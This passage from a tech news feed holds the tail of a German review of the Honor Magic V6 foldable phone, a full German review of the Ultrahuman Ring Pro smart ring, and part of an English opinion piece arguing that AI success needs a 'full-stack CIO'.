<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-19-um-22.16.03.png?w=1024" alt="Honor Magic V6" class="wp-image-4199626" width="1024" height="574" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Luke Baker</p></div>



<p class="wp-block-paragraph"><br><br>Das lässt sich zwar leicht beheben, und ich kann die Logik dahinter nachvollziehen – schließlich bieten Honor-Smartphones stets eine hervorragende Akkulaufzeit –, doch es ist äußerst ärgerlich, und ich würde mich sehr freuen, wenn dieses Problem behoben würde.</p>



<p class="wp-block-paragraph">Honor verspricht sieben Jahre lang Software-Updates und Sicherheitspatches für seine Flaggschiff-Geräte und liegt damit auf einer Stufe mit Samsung und Apple. Viel besser geht es kaum, auch wenn Sie möglicherweise eine Weile auf das auf <a href="https://www.pcwelt.de/article/2990238/android-17-release-features-update-2.html" target="_blank">Android 17</a> basierende MagicOS 11 warten müssen.</p>



<h2 class="wp-block-heading">Preis &amp; Verfügbarkeit</h2>



<p class="wp-block-paragraph">Das Honor Magic V6 kann ab sofort in Deutschland und den meisten anderen Ländern der Welt bestellt werden, wobei die USA wie üblich ausgeschlossen sind. Hierzulande liegt der Preis bei stolzen <a href="https://www.pcwelt.de/article/3183215/honor-magic-v6-test-review.html#" target="_blank">2.299 Euro</a>, wobei es bis zum 31. Juli noch einen Rabatt von 600 Euro gibt (Endpreis: 1.699,90 Euro).</p>



<p class="wp-block-paragraph">Als besonderes Einführungsangebot legt Honor auch eine Reihe kostenloser Extras wie ein Tablet, einen Stift und ein Set Earbuds bei. Das macht eine Beurteilung des Preises ziemlich schwierig. Auf dem Papier ist das Magic V6 deutlich teurer als das V5, das im vergangenen Jahr für 1.999 Euro auf den Markt kam. Und das schmerzt, insbesondere wenn man bedenkt, dass es seinem Vorgänger so ähnlich ist. Mit dem Rabatt ist es jedoch günstiger.</p>



<p class="wp-block-paragraph">Preislich bewegt es sich trotzdem noch in einem ähnlichen Rahmen wie viele andere Falt-Smartphones, die wir getestet haben. Darunter das <a href="https://www.pcwelt.de/article/3168239/motorola-razr-fold-test.html" target="_blank">Motorola Razr Fold</a>, <a href="https://www.pcwelt.de/article/2843601/samsung-galaxy-z-fold-7-test.html" target="_blank">das Samsung Galaxy Z Fold 7</a> und <a href="https://www.pcwelt.de/article/2945312/google-pixel-10-pro-test-3.html" target="_blank">das Google Pixel 10 Pro Fold</a>.</p>



<h2 class="wp-block-heading">Sollten Sie das Honor Magic V6 kaufen?</h2>



<p class="wp-block-paragraph">Das Magic V6 ist zweifellos eines der attraktivsten faltbaren Smartphones, die derzeit auf dem Markt erhältlich sind. Die Hardware ist hervorragend, die Bildschirme sind beeindruckend, es ist leistungsstark und die Kameras sind erstklassig. Wenn Sie ein faltbares Smartphone mit großem Bildschirm suchen, aber bei den Kameras keine allzu großen Abstriche machen möchten, ist dies eine hervorragende Wahl.</p>



<p class="wp-block-paragraph">Allerdings könnten versierte Käufer sich für das <a href="https://www.pcwelt.de/article/2838914/honor-magic-v5-test.html" target="_blank">Vorjahresmodell</a> entscheiden und für deutlich weniger Geld ein sehr ähnliches Gesamterlebnis erhalten. Es ist nach wie vor extrem leistungsstark und verfügt über dieselben Kameras. Es wird jedoch nicht ewig vorrätig sein.</p>



<p class="wp-block-paragraph">Man sollte auch bedenken, dass das Galaxy Z Fold 8 und das Z Fold 8 Ultra voraussichtlich im Juli 2026 erscheinen werden, während Apples lang erwartetes faltbares iPhone wahrscheinlich im September vorgestellt wird. Ich persönlich würde mir daher erst einmal ansehen, was diese Modelle zu bieten haben, bevor ich den Sprung wage.</p>



<p class="wp-block-paragraph">Wenn Sie nicht warten können, ist das Honor Magic V6 eine hervorragende Wahl und wird dies wahrscheinlich auch bleiben. Ich kann mir nicht vorstellen, dass Samsung die Akkukapazität übertreffen wird, und ich bezweifle sehr, dass es in puncto Kameraleistung übertroffen wird. Abgesehen von ein paar kleinen Software-Mängeln ist es ein brillantes Smartphone.</p>



<h2 class="wp-block-heading">Technische Daten</h2>



<ul class="wp-block-list">
<li>MagicOS 10, basierend auf Android 16</li>



<li>Außen: 6,52 Zoll, 1.080 x 2.420, OLED, 120 Hz</li>



<li>Innen: 7,95 Zoll, 2172 × 2352, OLED, 120 Hz</li>



<li>Fingerabdrucksensor im Ein-/Aus-Schalter</li>



<li>Qualcomm Snapdragon 8 Elite Gen 5</li>



<li>16 GB RAM</li>



<li>512 GB Speicher</li>



<li>Kamera:</li>



<li>50 MP, f/1,6 Hauptkamera</li>



<li>64 MP, f/2,5, 3-fach-Teleobjektiv</li>



<li>50 MP, f/2,2 Ultraweitwinkel</li>



<li>Doppelte 20-MP-Selfie-Kamera mit f/2,2</li>



<li>Videoaufnahmen mit bis zu 4K bei 60 fps (Rückkamera)</li>



<li>Stereolautsprecher</li>



<li>Dual-SIM</li>



<li>WLAN 802.11 a/b/g/n/ac/6e/7</li>



<li>Bluetooth 6.0</li>



<li>6660-mAh-Akku</li>



<li>80-W-Laden über Kabel</li>



<li>66 W kabelloses Laden</li>



<li>156,7 × 74,5 × 8,8 mm (zusammengeklappt)</li>



<li>IP69-zertifiziert</li>



<li>219 g</li>



<li>Farben: Gold, Rot, Weiß, Schwarz</li>
</ul>



<p class="wp-block-paragraph">(<a href="https://www.pcwelt.de/article/3183215/honor-magic-v6-test-review.html" data-type="link" data-id="https://www.pcwelt.de/article/3183215/honor-magic-v6-test-review.html" target="_blank">PC-Welt</a>)</p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Ultrahuman Ring Pro im Test: Ohne Abonnement und langlebig]]></title>
<description><![CDATA[Mike Sawh



Auf einen Blick



Pro




Insgesamt solide Tracking-Leistung



Ansprechende Begleit-App mit einigen nützlichen Modi



Beeindruckende Akkulaufzeit



Ohne Abonnement




Kontra




Hoher Preis



Klobiges Design



Softwarefunktionen entsprechen weitgehend denen des Air




Fazit

...]]></description>
<link>https://tsecurity.de/de/3694425/it-security-nachrichten/ultrahuman-ring-pro-im-test-ohne-abonnement-und-langlebig/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694425/it-security-nachrichten/ultrahuman-ring-pro-im-test-ohne-abonnement-und-langlebig/</guid>
<pubDate>Sat, 25 Jul 2026 18:59:22 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-23-um-16.11.10.png?w=1024" alt="Ultrahuman Ring Pro" class="wp-image-4200751" width="1024" height="554" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mike Sawh</p></div>



<h3 class="wp-block-heading">Auf einen Blick</h3>



<h3 class="wp-block-heading">Pro</h3>



<ul class="wp-block-list">
<li>Insgesamt solide Tracking-Leistung</li>



<li>Ansprechende Begleit-App mit einigen nützlichen Modi</li>



<li>Beeindruckende Akkulaufzeit</li>



<li>Ohne Abonnement</li>
</ul>



<h3 class="wp-block-heading">Kontra</h3>



<ul class="wp-block-list">
<li>Hoher Preis</li>



<li>Klobiges Design</li>



<li>Softwarefunktionen entsprechen weitgehend denen des Air</li>
</ul>



<h3 class="wp-block-heading">Fazit</h3>



<p class="wp-block-paragraph">Der Ultrahuman Ring Pro bietet ein hervorragendes Hardware- und Software-Erlebnis und zählt damit zu den besten Smart-Ringen. Das Problem ist der hohe Anschaffungspreis, ganz zu schweigen davon, dass die Konkurrenz – sowohl bei Modellen mit als auch ohne Abonnement – für manche Nutzer attraktivere Eigenschaften bieten kann.</p>



<p class="wp-block-paragraph">Der Ultrahuman Ring Pro ist der neueste <a href="https://www.pcwelt.de/article/3063681/bester-smart-ring-test.html" target="_blank">Smart-Ring</a> eines Unternehmens, das sich seit Langem im Konflikt mit Oura befindet. Nachdem der Verkauf seines Vorgängermodells in den USA vorübergehend untersagt worden war, kehrt Ultrahuman nun mit einem neuen Ring zurück, der über neu gestaltete Sensoren, eine verbesserte Prozessorleistung und eine längere Akkulaufzeit verfügt.</p>



<p class="wp-block-paragraph">Der <a href="https://www.pcwelt.de/article/3063689/ultrahuman-ring-air-test-2.html" target="_blank">Ring Air</a> ist weiterhin als günstigere Alternative zum Pro erhältlich, doch wenn Sie das Beste wollen, was Ultrahuman zu bieten hat, ist dieser hier die richtige Wahl.</p>



<p class="wp-block-paragraph">Leider sind die Preise für die Ringe von Ultrahuman – ähnlich wie bei dem ebenfalls abonnementfreien Konkurrenten RingConn – leicht gestiegen, was bedeutet, dass sich der Pro wirklich hervorheben muss, um die höheren Kosten zu rechtfertigen und zu einer der ersten Wahl unter den Smart-Ringen zu werden.</p>



<h2 class="wp-block-heading">Design &amp; Verarbeitung</h2>



<ul class="wp-block-list">
<li>Erhältlich in vier Farbvarianten</li>



<li>Dickeres Design als der Ring Air</li>



<li>Ladeetui im Lieferumfang enthalten</li>
</ul>



<p class="wp-block-paragraph">Der Ring Pro ist ein Smart-Ring mit einem schlichten Design, der in vier verschiedenen Farben erhältlich ist: Bionic Gold, Space Silver, Aster Black und Raw Titanium. Der Kern des Rings besteht aus Titan mit einer PVD-Beschichtung, die ihn vor Kratzern schützt. Ich habe festgestellt, dass frühere Ultrahuman-Ringe zu den am leichtesten zu zerkratzenden gehörten. Daher freue ich mich, dass der Pro Kratzer besser abwehrt.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-23-um-16.11.15.png?w=1024" alt="Ultrahuman Ring Pro" class="wp-image-4200752" width="1024" height="554" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mike Sawh</p></div>



<p class="wp-block-paragraph">Genau wie der Air ist auch der Pro in den Ringgrößen 5–14 erhältlich und bis zu einer Tiefe von 100 Metern wasserdicht. Ich habe mich für dieselbe Größe wie beim Air entschieden, und die Passform scheint ähnlich zu sein, wenn nicht sogar insgesamt etwas besser, da der Ring seltener an meinem Finger herumrutscht. Er ist sehr bequem und sitzt gut am Finger. Man spürt zwar die Sensoren, doch sie sind nicht so deutlich spürbar wie bei früheren Modellen.</p>



<p class="wp-block-paragraph">Im Vergleich zum Ring Air von Ultrahuman erhalten Sie einen schwereren und dickeren Ring. Da ich den <a href="https://www.pcwelt.de/article/3179739/oura-ring-5-test-review.html" target="_blank">Oura Ring 5</a> gleichzeitig getragen habe, wirkt der Pro deutlich größer als der neueste Ring von Oura.</p>



<p class="wp-block-paragraph">Der Pro wird mit einem Ladecase geliefert, und obwohl man es nicht mit dem neuen Case von Oura verwechseln würde, verfügt es über ein ähnlich robustes Metall-Design, das den Ring schützt, wenn er nicht am Finger getragen wird. Das Etui verfügt über zusätzliche intelligente Funktionen wie kabelloses Laden, einen „Find-my-Case“-Modus für den Fall, dass Sie es verlegen, ganz zu schweigen von der Möglichkeit, Ringdaten bis zu einem Jahr lang zu speichern.</p>



<p class="wp-block-paragraph">Ein interessanter Aspekt des Designs ist, dass Ultrahuman den Ring so konzipiert hat, dass er im Falle einer Schwellung leicht durchtrennt und entfernt werden kann. Auch wenn ich hoffe, dass niemand jemals in eine solche Situation gerät, ist es beruhigend zu wissen, dass sich der Ring in einem Notfall problemlos entfernen lässt.</p>



<h2 class="wp-block-heading">Fitness &amp; Tracking</h2>



<ul class="wp-block-list">
<li>Überarbeitete Temperatur- und Herzfrequenzsensoren</li>



<li>Neuer Dual-Core-Prozessor</li>



<li>Powerplugs bieten zusätzliche Funktionen gegen Aufpreis</li>
</ul>



<p class="wp-block-paragraph">Der Ring Pro kann so gut wie alles überwachen, was auch der Air kann. Dazu gehören Herzfrequenz, Schlaf, Stress, Temperatur und die tägliche Schrittzahl. Die größte Änderung besteht darin, dass die optischen Sensoren, die zur Erfassung dieser Messwerte verwendet werden, überarbeitet wurden und nun klarere Signale liefern, um Schlaf- und Erholungsdaten zu erfassen.</p>



<p class="wp-block-paragraph">Diese Neugestaltung scheint zudem mit den Patentstreitigkeiten mit Oura in Zusammenhang zu stehen.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-23-um-16.11.19.png?w=1024" alt="Ultrahuman Ring Pro" class="wp-image-4200753" width="1024" height="554" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mike Sawh</p></div>



<p class="wp-block-paragraph">Die App, die diese Daten anzeigt, gehört zu den ausgereiftesten, die Sie bei einem Smart-Ring finden können. Sie steht der Oura-App in nichts nach, was die ansprechende Aufbereitung Ihrer Daten angeht, und regt Sie dazu an, sich tatsächlich damit auseinanderzusetzen.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-23-um-16.11.33.png?w=1024" alt="Ultrahuman Ring Pro" class="wp-image-4200754" width="1024" height="571" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mike Sawh</p></div>



<p class="wp-block-paragraph">Was die Erfassung der Kerndaten angeht, müssen Sie die zweiwöchige Kalibrierungsphase unbedingt durchlaufen, bis Sie zuverlässige Ergebnisse erhalten. Die Daten zu den durchschnittlichen Herzfrequenzwerten wiesen während dieses Zeitraums erhebliche Abweichungen auf, stabilisierten sich jedoch nach diesen zwei Wochen.</p>



<p class="wp-block-paragraph">Die Daten zur Ruheherzfrequenz und die Messungen der Herzfrequenzvariabilität stimmten besonders gut mit zwei anderen Trackern überein, die ich parallel zum Pro trug.</p>



<p class="wp-block-paragraph">Bei der Betrachtung der Schrittzahlen stellte ich fest, dass die gemeldeten Gesamtwerte deutlich niedriger waren als bei zwei anderen Trackern, mit denen ich den Pro verglichen habe.</p>



<p class="wp-block-paragraph">Die Leistung bei der Schlafaufzeichnung gehört zu den besten, die ich getestet habe, einschließlich Oura. Was die Schlafdauer, die Aufschlüsselung der Schlafphasen und den erfassten Zeitpunkt des Einschlafens betrifft, lieferte der Pro zuverlässige Werte.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-23-um-16.11.42.png?w=1024" alt="Ultrahuman Ring Pro" class="wp-image-4200755" width="1024" height="543" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mike Sawh</p></div>



<p class="wp-block-paragraph">Ultrahuman hebt sich von der Konkurrenz dadurch ab, dass es komplexe Daten in einem leicht verständlichen Format darstellt, beispielsweise bei der Bewertung des Gehirnalters oder der Erfassung des Schlafdefizits, das sich aus kumulierten schlechten Nächten ergibt. Es überwacht zudem, wie gut Ihr Gehirn während des Schlafs Abfallstoffe abbaut. Sie können auch die „PowerPlugs“ von Ultrahuman erkunden, bei denen es sich größtenteils um kostenlose Add-ons handelt, die eine individuellere Nachverfolgung ermöglichen.</p>



<p class="wp-block-paragraph">Ich nutze derzeit das neue Parent-Modul, das besonders auf die kumulative Erholung achtet, berücksichtigt, dass der Schlaf wahrscheinlich unruhiger ist, und Ihnen Tipps gibt, wie Sie wieder in die richtige Bahn kommen können.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-23-um-16.11.49.png?w=1024" alt="Ultrahuman Ring Pro" class="wp-image-4200756" width="1024" height="577" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mike Sawh</p></div>



<p class="wp-block-paragraph">Wie bereits erwähnt, sind die meisten dieser PowerPlugs kostenlos. Es gibt jedoch auch solche, die Einblicke in spezielle Krankheiten wie Migräne bieten oder Daten mit einem Tesla synchronisieren; hierfür ist ein monatliches Abonnement erforderlich. Dabei handelt es sich um kostenpflichtige Funktionen, auf die die meisten Nutzer gut verzichten können.</p>



<h2 class="wp-block-heading">Akkulaufzeit &amp; Aufladen</h2>



<ul class="wp-block-list">
<li>Bis zu 15 Tage Akkulaufzeit</li>



<li>Bietet drei Akkubetriebsmodi</li>



<li>Ladeetui sorgt für weitere 45 Tage</li>
</ul>



<p class="wp-block-paragraph">Die Akkulaufzeit ist ein wichtiges Thema beim Pro-Modell – und das nicht nur, weil er länger durchhält als der Air. Neben der Verlängerung der Akkulaufzeit von 4–6 Tagen auf 15 Tage stehen Ihnen drei Akkubetriebsmodi zur Verfügung, mit denen Sie das Beste aus jeder Ladung herausholen können.</p>



<p class="wp-block-paragraph">Wenn Sie den Turbo-Modus wählen, bei dem alle Sensoren aktiviert sind, können Sie mit einer Laufzeit von bis zu 12 Tagen rechnen. Diese verlängert sich auf über 15 Tage, wenn Sie sich für den Chill-Akkumodus entscheiden. Dabei liegt der Schwerpunkt auf der Schlafaufzeichnung, doch wichtige Momente Ihres Tages werden weiterhin erfasst, um sicherzustellen, dass die wesentlichen Erkenntnisse weiterhin von Nutzen sind.</p>



<p class="wp-block-paragraph">Ich habe mit dem Pro problemlos eine Akkulaufzeit von fast zwei Wochen erreicht, was eine beeindruckende Leistung ist. Das ist besser als beim Oura Ring 5 und liegt in Bezug auf die Akkuleistung auf Augenhöhe mit dem <a href="https://www.pcwelt.de/article/3063223/ringconn-gen-2-test.html" target="_blank">RingConn Gen 2</a>.</p>



<p class="wp-block-paragraph">Zudem verfügen Sie nun über das Ladecase, das Ihnen eine zusätzliche Akkulaufzeit von 45 Tagen bietet. Sie müssen den Ring jedoch präzise im Ladegerät platzieren; ein akustisches Signal aus dem integrierten Lautsprecher bestätigt, dass der Ring wieder aufgeladen wird. Als der Akku auf 0 Prozent sank, benötigte der Pro weniger als eine Stunde, um wieder auf 100 Prozent zu kommen.</p>



<h2 class="wp-block-heading">Preis &amp; Verfügbarkeit</h2>



<p class="wp-block-paragraph">Zum Zeitpunkt der Erstellung dieses Artikels kann der Ultrahuman Ring Pro für 499 Euro im <a href="https://www.pcwelt.de/article/3181848/ultrahuman-ring-pro-test-review.html#" target="_blank">Ultrahuman Store</a> vorbestellt werden. Damit gehört er zu den teuersten Smart-Ringen auf dem Markt.</p>



<p class="wp-block-paragraph">Er ist teurer als das günstigste verfügbare Modell des Oura Ring 5 und andere Smart-Ringe wie der <a href="https://whttps//www.pcwelt.de/article/3062918/samsung-galaxy-ring-test.html" target="_blank" rel="noreferrer noopener">Samsung Galaxy Ring</a>. Der in Kürze erscheinende RingConn Gen 3 wird in den USA teurer sein als der Ring Pro, sollte in anderen Regionen jedoch günstiger sein.</p>



<p class="wp-block-paragraph">Wie der Ring Air bleibt auch der Pro ein Smart-Ring ohne Abonnement. Einige der PowerPlug-Software-Erweiterungen sind jedoch mit zusätzlichen Kosten verbunden.</p>



<h2 class="wp-block-heading">Sollten Sie den Ultrahuman Ring Pro kaufen?</h2>



<p class="wp-block-paragraph">Die großen Verbesserungen des Ring Pro gegenüber dem Air liegen in dem größeren Akku und dem robusteren Design. Ich habe die Überwachungsleistung des Air nie als unzureichend empfunden, und wenn Sie noch ein Exemplar ergattern können und ein Fan des Software-Ansatzes von Ultrahuman sind, dann ist er nach wie vor eine kluge (und günstigere) Anschaffung.</p>



<p class="wp-block-paragraph">Vergleicht man den Ring Pro mit anderen Smart-Ringen, müssen wir über den Preis sprechen. Er ist teuer, und es gibt abonnementsfreie Alternativen zu einem günstigeren Preis. Ob diese Ihnen auf der Softwareseite das gleiche Maß an Sorgfalt und Aufmerksamkeit bieten, ist fraglich. Genau hier setzt sich der Ring Pro gegenüber einem Großteil der Konkurrenz durch.</p>



<p class="wp-block-paragraph">Er ist vielleicht nicht der kleinste oder dünnste Ring, aber was der Ring Pro zu bieten hat, ist eine Kombination aus Hardware und Software, die ein hervorragendes Gesamtpaket ergibt.</p>



<h2 class="wp-block-heading">Technische Daten</h2>



<ul class="wp-block-list">
<li>Bis zu 15 Tage Akkulaufzeit</li>



<li>Kompatibel mit Android und iOS</li>



<li>Wasserdicht bis zu 100 Metern</li>



<li>2,65 mm dick</li>



<li>Gewicht: 3,3–4,8 g</li>



<li>Erfasst den Blutsauerstoffgehalt, die Herzfrequenz und die Körpertemperatur</li>



<li>Erfasst den Schlaf und die tägliche Aktivität</li>
</ul>



<p class="wp-block-paragraph">(<a href="https://www.pcwelt.de/article/3181848/ultrahuman-ring-pro-test-review.html" data-type="link" data-id="https://www.pcwelt.de/article/3181848/ultrahuman-ring-pro-test-review.html" target="_blank">PC-Welt</a>)</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI success requires a full-stack CIO]]></title>
<description><![CDATA[Every CIO I speak with today is wrestling with some version of the same question: How do we move faster with AI and deliver on our commitments?



It’s an understandable concern. Boards and CEOs are asking about AI. Business leaders are experimenting with use cases. Employees are discovering tool...]]></description>
<link>https://tsecurity.de/de/3694399/it-security-nachrichten/ai-success-requires-a-full-stack-cio/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694399/it-security-nachrichten/ai-success-requires-a-full-stack-cio/</guid>
<pubDate>Sat, 25 Jul 2026 18:57:42 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Every CIO I speak with today is wrestling with some version of the same question: How do we move faster with AI and deliver on our commitments?</p>



<p class="wp-block-paragraph">It’s an understandable concern. <a href="https://www.cio.com/article/4171959/ceos-top-priorities-for-it-leaders-today-2.html">Boards and CEOs are asking about AI</a>. Business leaders are experimenting with use cases. Employees are discovering tools daily, while technology vendors promise unprecedented gains in productivity, innovation, and competitive advantage.</p>



<p class="wp-block-paragraph">After hundreds of conversations with technology executives over the past year, I’ve become convinced that speed isn’t the real issue. The organizations pulling away from the pack aren’t necessarily adopting AI faster than everyone else. They’re executing more effectively — a subtle distinction that represents one of the defining leadership challenges of the AI era.</p>



<p class="wp-block-paragraph">Technology has never been the hardest part of transformation. People, priorities, culture, and operating models are the biggest challenges. The ability to translate bold boardroom aspirations into thousands of thoughtful decisions made every day by architects, engineers, product managers, analysts, and business leaders is where competitive advantage is created. AI may be accelerating the pace of change, but it hasn’t changed that fundamental truth.</p>



<p class="wp-block-paragraph">I’ve met plenty of executives who are exceptional in the boardroom. They know how to frame a vision, <a href="https://www.cio.com/article/272180/relationship-building-networking-how-to-wow-your-board-of-directors.html">influence a board</a>, and build confidence among investors and business leaders. I’ve also met remarkable technologists who instinctively understand the architectural decisions, engineering tradeoffs, and implementation details that determine how great ideas become reality. Modern CIOs, however, must move comfortably between both worlds. Afshean Talasaz is one who stands out among this rare breed.</p>



<p class="wp-block-paragraph">Long before becoming CIO of Colonial Pipeline, Talasaz built his career from the ground up as a business professional, data scientist, and technologist. He has designed enterprise platforms, built AI capabilities, led technology organizations, and partnered closely with executive leadership teams on business transformation. Today, as an executive in residence with our Practitioners for Practitioners (P4P) community, he helps CIOs and business leaders navigate one of the most significant technology shifts of our generation.</p>



<p class="wp-block-paragraph">While Talasaz brings deep knowledge of data and AI to the table, his greatest strength is his ability to create strategy and connect it with execution. He can spend the morning discussing enterprise reinvention with the board and the afternoon debating architectural principles with the teams responsible for bringing that vision to life.</p>



<p class="wp-block-paragraph">That versatility gives Talasaz a unique lens on how CIOs <a href="https://www.cio.com/article/4178006/state-of-the-cio-2026-cios-set-the-course-for-ai-roi.html">can deliver value with AI</a>.</p>



<p class="wp-block-paragraph">Software companies have a term for engineers who understand every layer of the technology stack: full-stack developers. Listen to Talasaz and it becomes evident that the AI era requires something similar from technology leaders: a full-stack CIO.</p>



<h2 class="wp-block-heading">The full-stack CIO: Leading with clarity</h2>



<p class="wp-block-paragraph">A full-stack CIO understands how every layer of the enterprise influences the next. They recognize that every strategic priority becomes a portfolio investment, every investment shapes an operating model, every operating model influences architecture, every architecture choice informs product decisions, every product decision shapes engineering priorities.</p>



<p class="wp-block-paragraph">The best CIOs understand both ends of that journey. The extraordinary ones understand everything in between.</p>



<p class="wp-block-paragraph">And those who execute best lead with clarity, Talasaz says.</p>



<p class="wp-block-paragraph">“Everyone, from executives to middle managers to the people writing code, should be able to explain what we’re trying to achieve,” he emphasizes. “Clarity isn’t that we’ve handed out the PowerPoint. It’s that people genuinely understand where we’re going and can articulate it in their own language.”</p>



<p class="wp-block-paragraph">One of the unintended consequences of the AI boom is that organizations are beginning to confuse activity with alignment. They have AI councils, AI governance committees, AI innovation labs, AI centers of excellence, AI pilots, and AI roadmaps. Yet if you stop ten people in the hallway and ask a deceptively simple question, What business problem are we actually trying to solve? you’ll often hear ten different answers.</p>



<p class="wp-block-paragraph">As a result, architects optimize for one objective while product teams optimize for another. Business units pursue opportunities that seem perfectly reasonable from their perspective. Engineers make thoughtful technical decisions based on the information available to them. Individually, none of those decisions are necessarily wrong. Collectively, however, they create organizational drift. AI doesn’t create that problem. It simply accelerates the consequences.</p>



<p class="wp-block-paragraph">And while AI can be a force multiplier for the positive when every decision is guided by a shared understanding of where the organization is headed, it can also be a force multiplier for the negative, resulting in an organization simply moving faster in different directions.</p>



<p class="wp-block-paragraph">“When we have the fundamentals right, the tech infrastructure, the operating models, the nuances of how our business actually runs, we get the impacts of AI in a positive way,” Talasaz says. “When we don’t have those in place, AI can amplify the gaps or mute the benefits.”</p>



<p class="wp-block-paragraph">At a time when so much of the conversation surrounding AI is focused on algorithms, agents, and automation, it’s an important reminder that organizations don’t execute strategy; people do.</p>



<h2 class="wp-block-heading">Reducing organizational friction</h2>



<p class="wp-block-paragraph">Most executives are familiar with the concept of VUCA that characterizes today’s business environment. But Talasaz stresses the importance of turning this concern inward: “If the world outside our organizations is becoming more volatile, uncertain, complex, and ambiguous, what are we, as leaders, doing to the inside of our organizations?”</p>



<p class="wp-block-paragraph">Leaders spend enormous amounts of time helping their organizations respond to external disruption but comparatively little time asking whether they are inadvertently re-creating those same conditions internally in response to those external needs. Are we reducing uncertainty or introducing more of it? Are we simplifying work or adding unnecessary complexity? Are we helping people focus on what matters most, or asking them to navigate competing priorities and shifting expectations?</p>



<p class="wp-block-paragraph">Talasaz refers to this phenomenon as double VUCA — something I’ve witnessed repeatedly while working with CIOs over the past decade. Organizations often assume they’re struggling because of technology limitations when the real constraint is organizational friction. Teams wait for decisions. Priorities shift faster than roadmaps. Governance grows heavier. New committees are formed to solve problems created by existing committees. Everyone is working harder, yet the organization somehow feels slower.</p>



<p class="wp-block-paragraph">AI amplifies both outcomes. Organizations with clarity become dramatically more effective because AI accelerates good decisions. Organizations without clarity simply accelerate confusion.</p>



<h1 class="wp-block-heading">Operating model as strategy enabler</h1>



<p class="wp-block-paragraph">AI governance is one way to achieve greater clarity, but as Talasaz says, governance shouldn’t primarily exist inside policy manuals that few people read.</p>



<p class="wp-block-paragraph">Instead, AI governance should be embedded in the daily rhythms of the organization, shaping how teams collaborate, how decisions are made, how products move from ideas into production, and how innovation happens safely without requiring constant escalation. In other words, it’s all about your operating model.</p>



<p class="wp-block-paragraph">“If you had to pick one thing that isn’t technology, your operating model is the most important element for executing data and AI at scale,” he says.</p>



<p class="wp-block-paragraph">The best operating models create enough clarity that capable people can make thousands of decisions independently and confidently, without having to wait for permission. By embedding good governance into the way it works, the organization becomes faster.</p>



<p class="wp-block-paragraph">This advice echoes something I’ve heard repeatedly from some of the world’s most respected CIOs: High-performing organizations aren’t built on tighter control; they’re built on greater trust, supported by clear principles, shared expectations, and operating models that enable responsible decision-making at every level of the enterprise.</p>



<p class="wp-block-paragraph">Talasaz points out that technology leaders tend to speak in terms of <em>transformation</em>. He suggests CIOs consider a different word: <em>reinvention.</em></p>



<p class="wp-block-paragraph">As he explains, transformation implies replacing what exists today with something new. Reinvention starts with a more clear-eyed and practical premise: Some things absolutely must change; others represent years, sometimes decades, of accumulated expertise, customer trust, operational discipline, and competitive advantage.</p>



<p class="wp-block-paragraph">Reinvention is about building on those strengths while also creating new ways to deliver value. The leaders making the greatest progress in their AI journeys seem to recognize that it’s less about abandoning the past than thoughtfully preparing the organization for the future.</p>



<h2 class="wp-block-heading">Closing the gap between strategy and execution</h2>



<p class="wp-block-paragraph">Full-stack CIOs must be able to map out the various layers of execution and planning that need to be done at every level of the organization to be successful. To help with this, Talasaz has developed a data and AI framework that draws on his own experiences “from the keyboard to the boardroom.”</p>



<p class="wp-block-paragraph">As Talasaz sees it, too many organizations have been doing good work in isolation. “They’re doing a lot of the right things,” he says. “They’re just not connected.”</p>



<p class="wp-block-paragraph">Boards may be discussing growth while business leaders redesign customer experiences. Product teams may be prioritizing new capabilities while architects modernize platforms. Data teams may be improving quality while engineers focus on delivery. Every group makes meaningful progress within its own domain, yet somewhere between strategy and execution, the connective tissue begins to disappear. Talasaz’s framework brings those connecting points to the forefront.</p>



